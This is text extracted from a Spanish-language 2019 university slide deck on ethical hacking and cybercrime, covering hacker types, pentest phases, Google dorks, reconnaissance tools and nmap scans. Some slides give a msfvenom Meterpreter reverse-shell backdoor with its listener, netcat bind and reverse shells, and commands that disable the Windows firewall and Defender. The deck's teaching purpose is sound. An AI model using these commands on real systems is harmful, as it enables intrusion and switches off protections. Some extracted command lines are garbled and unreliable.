UISEK - CIBERSEGURIDAD - Ecforensics CIBERDELITOS - Julio 2019
UISEK - CIBERSEGURIDAD - Ecforensics CIBERDELITOS - Julio 2019
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ing. Luis Fabián Hurtado Vargas, MGS
• Ecforensics, CEO.
• Magister en Seguridad Telemática, ESPOCH
• Ingeniero en Sistemas Computacionales, UEES
• Licenciado en Sistemas de Información Gerencial, UEES
• Diplomado en Administración de Redes, UEES
• Tecnólogo en Informática, TES
• Técnico Superior en Electrónica, ITSB
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ing. Luis Fabián Hurtado Vargas,
MGS
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ing. Luis Fabián Hurtado Vargas, MGS
Instructor para academias y universidades
23 años experiencia.
• UISEK
• UTA
• UTC
• UTE
• ESPOCH
• CEDIA
• NEW HORIZONS
• UIDE
• UPS
• UEES
• CENTRO TECNOLOGICO NAVAL
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Casos importantes a nivel nacional
• UISEK
• Coordinator de la 1era. Maestría en Ciberseguridad del país.
• INSTITUCIONES VARIAS
Jefe del TI – Consejo de la Judicatura
Analista de Redes e incidentes - APG
Técnico de Redes
Programador
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Casos importantes a nivel nacional
• Irregularidades Laborales
• Fraude Bancario
• Ingeniería Social Phishing
• Injurias
• Estafa
• Extorción
• Suplantación de Identidad
• Explotación Sexual de menores
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
¿PORQUE ES IMPORTANTE EL
ESTUDIO DE EH?
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Para verificar que nuestra infraestructura de casa/corporativa sea segura.
Para asegurar nuestros propios entornos tecnológicos.
Oportunidades de mejoramiento profesional (una de las 10 mejores
pagadas).
Aumentar la conciencia de seguridad.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Los mejores
pagados
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Existe el termino HACKER?
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
…según el RFC 1392, hacker es Un
a persona que se deleita en tener total comprensión
del funcionamiento interno de un sistema, computad
oras y redes en particular.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Qué es PENTESTING
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
• Ganar acceso de forma no autorizada a cualquier cosa.
• Ver o interactuar con información que no se tiene permiso.
• Es una serie de pruebas controladas, con el objetivo de
encontrar vulnerabilidades en un sistema para su mitigación.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Riesgos de
seguridad
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
• Extorsión cibernética
• Redes zombie.
• Exploits en nueva tecnología
• Redes sociales
• Virtualización y cómputo
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Black Hat Hacker
Descubren cosas nuevas.
No cumplen reglas.
Asume retos.
Experimentan cosas nuevas.
Están muy expuestos.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
White Hat Hacker
Buenas personas.
No usan sus habilidades para
propósitos ilegales.
Expertos en seguridad inform
ática los cuales ayudan a
proteger de BHH.
Contratados, en nomina.
Cuidan de Ingeniería Social.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
• El término “Gray Hat Hacker" se refiere a un hacker
informático o un experto en seguridad informática que a
veces puede violar leyes o estándares éticos típicos, pero
no tiene la intención maliciosa típica de un hacker de
sombrero negro.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Phreaker
Vulneran teléfonos y pto. 5060, centrales telefónicas
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Clave de sonidos telefónicos
https://vimeo.com/112783389
Tsutomu Shimomura
Kevin Mitnick
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
CRACKER
Cracker (no confundir con las galletas)
Vende información en Deep Web
Descubren vulnerabilidades y vende la solu
ción a empresa.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Script-kiddie
Recién comienza, no profesionales, siguen
un libreto, no crean.
Lammer
Ego
Fanfarrones
No saben mucho
Chiripa!
Newbie
Novato que tropieza con una pagina web
sobre hacking y baja todas los programas
a la pc, lee y ejecuta.
Es muy Inofensivo.
Hacktivistas
Hackean por motivación social, defensa del
consumidor, ingreso a la política, venganza.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
El grooming (en español «acicalar») es una serie de conductas y
acciones deliberadamente emprendidas por un adulto con el objetivo
de ganarse la amistad de un menor de edad, creando una conexión
emocional con el mismo, con el fin de disminuir las inhibiciones del
niño y poder abusar sexualmente de él. En algunos casos, se puede
buscar la introducción del menor al mundo de la prostitución infantil
o la producción de material pornográfico.
WiKi
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Caso Real 1
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
ATAQUES: CATEGORÍAS
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
ATAQUES: CATEGORÍAS
1. Interrupción: Ataque a la Disponibilidad.
2. Intercepción: Ataque a la Confidencialidad.
3. Modificación: Ataque a la Integridad.
4. Fabricación: Ataque a la Autenticidad.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Flujo Normal de la Información
Destino de i
Fuente de inf nformación
ormación
Flujo Normal
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ataque a la Disponibilidad
• Algo de "valor" en el sistema es destruido o se vuelve
no disponible.
• Ejemplos: destrucción de HW, cortado de una línea
de comunicación, deshabilitación de un FS
(umount).
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ataque a la Confidencialidad
• Alguien no autorizado gana acceso sobre algo de valor.
• El "no-autorizado" puede ser una persona, una máquina
o un programa.
• Ejemplos: captura de información en una red, o una
copia no autorizada de archivos.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ataque a la Integridad
• Alguien (o algo) no solo gana acceso sino que también modifica
contenido.
• Ejemplos: cambiar valores en un archivo, alterando un programa
para que se comporte diferente, o modificando un mensaje
transmitido en una red.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ataque a la Autenticidad
• Alguien (o algo) inserta objetos falsos en el sistema.
• Ejemplos: inserción de msgs equivocados en una red o
inserción de registros falsos en un archivo.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Laboratorio –
antes de
instalarlo…
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
• Un PC robusto: marca con excelente soporte y características de última generación.
• Tarjeta inalámbrica actualizada: realizar ataques, realizar a redes inalámbricas.
• Software probado: Sysinternals, Hiren’s Boot, Kali Linux, Backbox
• Buen enlace de internet: el mejor ancho de banda.
• Comunicaciones anónimas: TOR, Tails, OpenVPN, Opera VPN, Proxies Hide my ass, whois,
whatismyipaddress, etc.
• Encriptación de contenidos: TrueCrypt, VeraCrypt.
• Gestor de contraseñas: Keepass, LastPass, OnePass.
• Cuentas falsas: que parezca real, pruebas de Ing. Social,
usar comunicaciones seguras.
• Windows (Desktop & Server): excelente víctima.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Sistemas y
distribuciones para
realizar Auditoria
Informática (EH) y
Análisis Forense
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
• Kali Linux • Samurai Web Testing Framework
• Network Security • WifiSlax
Toolkit • WifiWay
• Parrot Security OS • Pentoo Linux
• DEFT Forensic Linux
• Black Arch Linux
• CAINE Linux (Forensic)
• BackBox
• BugTraq
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Hipervisor - Hospedero
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Usaremos un programa HIPERVISOR para HOSPEDAR máquinas
virtuales.
Virtualizaremos 4 máquinas:
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Una
jakeadita… con
Metasploit
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
1. Crear el payload
msfvenom --platform windows -p windows/meterpreter/reverse_tcp
LHOST=192.168.100.40 LPORT=4444 -f exe -o backdoor.exe
2. Levantar el listener:
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.100.40 <IP KALI>
set lport 4444
exploit
Metodología Pentesting
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
DIFERENCIAS
ENTRE TEST
DE CAJA
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Black Box - PTest
Test de Penetración de Seguridad donde el técnico no cuenta con infor
mación sobre el sistema. Refleja de la mejor manera posible un ataque
real. Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
• DNS
• Puertos
• Servidores Web
• Conexiones seguras
• Sistemas de validación de usuarios
• Intrusión a bases de datos
• Intrusión a intranet
• Servicios en la nube
Alcance de la Evaluación:
• Footprinting
• Scanning
• Enumeración
• Análisis de vulnerabilidades automatizado y procesos manuales.
• Comprobación
• Penetración
• Escalamiento
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
White Box - PTest
Se entrega la información interna de las empresas.
Proporcionan un mapa de red, firewalls, sistemas operativos, tipos
de autenticación, usuarios, tecnología de sitios web, etc.
Son realizadas generalmente por un equipo interno, pero ahora es
más frecuente asignarlo a un equipo externo.
Se convierte en parte fundamental del ciclo de vida del desarrollo
de software.
No se invierte tiempo en la fase de descubrimiento (fingerprint)
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
El CLIENTE proporciona una estructura detallada de sus
infraestructura de red.
Evaluaciones a considerar:
• DNS
• Puertos
• Servidores Web
• Conexiones seguras
• Sistemas de validación de usuarios
• Intrusión a bases de datos
• DMZ
• Routers y switches
• Configuraciones de seguridad en servidores.
• Test de fuerza bruta
Alcance de la Evaluación: Acceso Total
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Gray Box - PTest
Mezcla características de las 2 anteriores.
Test de Penetración de Seguridad donde el técnico cuenta co
n información imitada sobre el sistema.
Se da a conocer alguna información al pentester.
Sirve para profundizar en aquellos puntos críticos del sistema.
Útil para conocer ataques que puede llegar hacer un usuario.
(user and privilegies) a nivel interno.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
El CLIENTE proporciona el nombre de su
organización, una estructura interna de sus redes.
Evaluaciones a considerar:
• DNS
• Puertos
• Servidores Web
• Sistemas de validación de usuarios
• Intrusión a intranet
• Servicios en la nube
• Alcance de Evaluación:
• Acceso Total
Stakeholders y búsquedas simples
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
1 - Reconocimiento: Introducción a Google Hacking
2 - Escanear: Introducción a nmap
3 - Ganar acceso: Introducción a ataques de fuerza bruta
4 - Mantener acceso: Introducción a backdoors
5 - Eliminar evidencia: Introducción a interpretación de logs
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
RECONOCIMIENTO
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
https://www.offensive-security.com/commuity-projects/google-hacking-database/
• Es una fase preparatoria, donde el atacante busca
información acerca de un objetivo, antes de atacar.
• Reconocimiento de un rango de objetivos, puede incluir
a clientes, empleados, operaciones, red y sistemas de
una organización.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
El Reconocimiento puede ser …
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
PASIVO
Incluye información sin interactuar directamente con el objetivo.
Ejemplo: búsqueda en registros públicos.
ACTIVO
Involucra la interacción directa con el destino por cualquier medio.
Ejemplo: a través de llamadas telefónicas, por correo electrónico, etc.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
ESCANEO
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
⚫ Fase de preataque
Cuando el atacante escanea la red por información específica, en base a la información obtenida
durante el reconocimiento.
⚫ Escaneador de puertos.
Puede incluir el uso de dialers, escaneadores de puerto, mapeo de red, sweeping, escaneador de
vulnerabilidad
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
⚫ Extraer información.
Los atacantes extraen información tales como nombres de computadoras, direcciones IP, y
cuentas de usuario para lanzar ataques.
OBTENER
ACCESO
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
⚫ Se refiere al punto donde el atacante consigue acceso para el OS, aplicaciones o red.
⚫ El atacante puede escalar privilegios para tomar el control del sistema. En el proceso,
los sistemas intermedios que son conectados a éste, también son comprometidos.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
MANTENER
ACCESO
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
✓ Es la fase cuando el atacante trata de retener la propiedad del sistema.
✓ El atacante puede evitar que el sistema sea propiedad de otros
atacantes, asegurando el acceso exclusivo con backdoors, rootkits o trojans.
✓ Pueden subir, descargar, o manipular datos, aplicaciones y configuraciones en el
sistema comprometido.
✓ Utilizan el sistema para lanzar más ataques.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
CUBRIR
HUELLAS
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Se refiere a las tareas realizadas por el atacante para ocultar actos maliciosos.
Las intenciones del atacante incluyen:
1. Continuar el acceso al sistema de la víctima.
2. Permanecer oculto con técnicas como Persistencia o Esteganografía
3. Eliminar las evidencias que podría conducir a su persecución.
El atacante sobrescribe logs de aplicaciones para evitar sospechas.
Powershell Hacking, Netcat, deteniendo
el Firewall y más
Shell Directo
WINDOWS - VÍCTIMA
LINUX - ATACANTE
nc -n -v IP WINDOWS 7777 nc -v -n -l -p 7777 -e cmd.exe
Shell Reverso
nc -n -v -l -p 8888 nc -n -v IP LINUX 8888 -e cmd.exe
cd C:\Windows\system32
netsh advfirewall set allprofiles state off
sc Stop WinDefend
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Footprinting
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
• En esta fase se consigue:
1. Información del objetivo
2. Dirección
3. Numero de teléfono
4. Ocupación
5. Correos
6. Direcciones ip
7. Listado de personas allegadas
8. Redes sociales
9. Chats
Información de la Red:
1. Intranet, extranet, remoto
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Ud. Debe
preguntarse…????
• Cuál es la empresa, dirección, a
que se dedica, aparece en Google,
números de teléfono, quienes son
sus empleados?
• Cual es su página de internet?
• Cuáles son las direcciones ip
externas?
• Cuáles son las rutas ip hacia los
servidores web?
• Cuáles son sus cuentas de
correo?
• Cuáles son los proveedores de
servicios externos?
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Google DORKS : Operadores de
búsqueda
Los operadores de búsqueda de Google son términos de
consulta o símbolos que realizan acciones especiales.
Estos operadores te permiten encontrar lo que buscas de
forma rápida y precisa, ofreciendo control adicional más
allá de la página Búsqueda avanzada.
Esta información puede ser obtenida a través de recursos
públicos, ejecutando utilidades como Whois, NSLookup,
NetCraft, DNS Reports o simplemente buscando
manualmente a través de la Web.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
OPERADORES
FORMA
GRÁFICA
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
SERVICIO PTO
HTTP 80
Puertos a Escanear HTTPS 443
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI SSH 22
FTP 21
SMTP 25
NETBIOS SSN 139
MICROSOFT DS 445
TELNET 23
MS-TERM-SERV 3389
MSRPC 135
NETBIOS 137
SNMP 161
MS-SQL-M 1434
NTP 123
NETBIOS DGM 138
MICROSOFT DS 445
MSRPC 135
DHCPS 67
NETBIOS SSN 139
DNS 53
Operadores
“” : especifica a Google que desea buscar una expresión compuesta de 2 o mas palabras literalmente, escribiendo los
términos a buscar entre comillas. "Belford Monmouth"
AND : Google buscará resultados uniendo las palabras ingresadas, relacionando las mismas. “Autocad AND Ecuador”
“-“ en una búsqueda no muestra lo que está a su derecha.
Site: muestra un dominio especifico.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Filetype: filtra la búsqueda solo por una extensión determinada. filetype:pdf site:fiscalIa.gob.ec , site:hp.com filetype:txt
Allintext: busca una cadena de texto especifica en una página web. allintext:password
Site:Google.com allintext:password
allintitle: busca una cadena de texto especifica en el título de una página web
Allintitle:index of .pdf - Allintitle:index of filetype:pdf - Allintitle:index of hacking filetype:pdf
Intitle: Busca una cadena de texto dentro del título de la web. Intitle:hacking site:sony.com
Inurl: busca una cadena de texto en una url especifica (usan mucho los Defacers)
Inurl:backtrack (busca todo lo relacionado a una url que contenga la palabra) inurl:10000 "Login to Webmin"
Autor: busca escritos por el nombre o cuenta de correo indicada autor:Fabián Hurtado
Cache: accedemos a una web que Google tiene en su cache, por ejemplo, cuando han borrado uno tema y n
o ha pasado mucho tiempo y no se puede accesar, se lo recupera. También sirve como ayuda para que no no
s rastreen. Cache: Microsoft.com (esto no queda registrado)
Link: encontramos links que nos direccionan a los sitios buscados. Link:cisco.com
Site:.net filetype:doc site:.net “index of/root” intitle:"Index of" "Apache/2.4.7 (Ubuntu) Server"
inurl:/proc/self/cwd
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Herramienta whois
• whois
• whois -H dominio.com
(Google.com, presidencia.gob.ec, etc)
• http://whatismyipaddress.com/
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS,
según reglas del IEPI – SENADI
FORWARD LOOKUP BRUTEFORCE
REVERSE LOOKUP BRUTE FORCE
• host www.dominio.com
• host ip
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS,
según reglas del IEPI – SENADI theharvester
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
DNS
Brutting
dnsmap domino
dnsrecon -d google.com -t std
dnsenum dominio
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
dmitri – whatweb – nikto
uniscan - joomscan
dmitry -wnseo www.agroscopio.com
dmitry -pbo 184.168.38.1 (puertos abiertos del domino)
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Este programa es capaz de generar diccionarios de claves en función de diversos parámetros.
Se puede generar un diccionario indicando la longitud mínima y también la longitud máxima, asimismo,
también se puede definir si para crear el diccionario queremos solo utilizar todos los números, símbol
os, letras e incluso por ejemplo podremos definir de usar solo varios números y letras, Crunch se enca
rgará de generar todas las combinaciones.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
La manera más sencilla de ejecutar Crunch es definiendo la longitud mínima (de inicio) y máxima (de fi
n) de la cadena que se desea crear. La opción “-o” o “>” especifica el archivo al cual escribir los resulta
dos.
crunch min max parm > diccionario.txt
-p evita que se repitan los caracteres
-t ingresar frases
% inserta números
@ inserta minúsculas
, inserta mayúsculas
^ inserta caracteres especiales incluido el espacio
Crunch 8 8 –f /usr/share/rainbowcrack/charset.txt mixalpha >…
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Hydra
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Se utiliza diccionario muy completo
Se ataca a puertos
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
JOHN THE RIPPER
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Decripta el algoritmo criptográfico MD5 - SHA1 - 256
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Nmap ("Network Mapper") es una herramienta de código abierto para
exploración de red y auditoría de seguridad.
Fue diseñado para escanear rápidamente grandes redes, aunque funciona bien
contra los ejércitos individuales.
Nmap utiliza paquetes IP en bruto en formas novedosas para determinar qué
hosts están disponibles en la red, qué servicios (nombre de la aplicación y
versión) estos equipos ofrecen, qué sistemas operativos (y versiones del
sistema operativo) que se están ejecutando, qué tipo de filtros de paquetes /
cortafuegos están en uso, y docenas de otras características.
Mientras Nmap es comúnmente utilizado para las auditorías de seguridad,
muchos sistemas y administradores de red resulta útil para tareas de rutina,
tales como inventario de red, gestión de horarios de servicios de
actualización y supervisión de host o tiempo de servicio.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Qué se puede encontrar con NMAP?
Nmap 7.70 ( https://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
1.TARGET SPECIFICATION
2.HOST DISCOVERY
EXAMPLES:
3.SCAN TECHNIQUES
nmap -v -A scanme.nmap.org
4.PORT SPECIFICATION AND SCAN ORDER
nmap -v -sn 192.168.0.0/16 10.0.0.0/8
5.SERVICE/VERSION DETECTION
6.SCRIPT SCAN
nmap -v -iR 10000 -Pn -p 80
7.OS DETECTION
SEE THE MAN PAGE (https://nmap.org/book/man.ht
8.TIMING AND PERFORMANCE ml) FOR MORE OPTIONS AND EXAMPLES
9.FIREWALL/IDS EVASION AND SPOOFING
10.OUTPUT
11.MISC
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Que resultado me dan estas instrucciones?
nmap –iflist
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Namp –r 192.168.10.1 escaneo rápido
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
1 Escanear un único host o una dirección IP (IPv4)
La IL-opción permite leer la lista de sistemas de destino mediante un archivo de texto. Esto es útil para
analizar un gran número de hosts / redes. Cree un archivo de texto:
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
3: Escanear varias direcciones IP o subred (IPv4)
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
4: Exclusión de hosts / redes (IPv4)
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
5: Encienda el script de sistema operativo y versión de escaneo
nmap -A 192.168.1.254
nmap -v-A 192.168.1.1
nmap -A-iL /tmp/scanlist.txt
nmap -6 IPv6-Address-aquí
nmap -6 server1.cyberciti.biz
nmap -6 2607: f0d0: 1002:51 :: 4
nmap -v A -6 2607: f0d0: 1002:51 :: 4
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
9: Escanear una red y averiguar qué servidores y dispositivos están
corriendo.
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
Nmap -F 192.168.1.1
15: La forma más rápida para escanear todos los equipos para puerto 19: Escanear un host con serie de PING’s IP
s abiertos a la vez
nmap -PO 192.168.1.1
nmap -T5 192.168.1.0/24
20: Escanear un host que utiliza UDP mesa de ping
16: Detectar el sistema operativo remoto
Este análisis no pasa por firewalls y filtros de pantalla que sólo TCP:
nmap -O 192.168.0.1 nmap -PU 192.168.1.1
nmap -O -osscan-guess 192.168.0.1 nmap -PU 2000.2001 192.168.1.1
nmap -v-O - osscan-guess 192.168.0.1
17: Detectar servicios remotos (servidor / daemon) números de versi 21: Los más utilizados los puertos TCP que utilizan TCP SYN Scan
ón # # # Sigiloso escanear # # #
nmap -sS 192.168 0,1 0,1
Nmap -sV 192.168.1.1 Los más repetitivos que utilizan los puertos TCP TCP connect scan (aviso: no hay exploración sigilo)
# # # OS Fingerprinting # # #
nmap -sT 192.168 0,1 0,1
18: Escanear un host que utiliza TCP ACK (PA) y TCP Syn (PS) de pin
g Los más repetitivos que utilizan los puertos TCP scan TCP ACK
nmap -sA 192.168 0,1 0,1
Si el firewall está bloqueando estándar pings ICMP, pruebe los métodos siguie
ntes descubrimiento de acogida: Los más repetitivos que utilizan los puertos TCP TCP Window scan
nmap -PS 192.168.1.1 nmap -sW 192.168 0,1 0,1
nmap -PS 80,21,443 192.168.1.1
nmap -PA 192.168.1.1 Los más repetitivos que utilizan los puertos TCP TCP Maimon scan
nmap -PA 80,21,200-512 192.168.1.1
nmap -sM 192.168 0,1 0,1
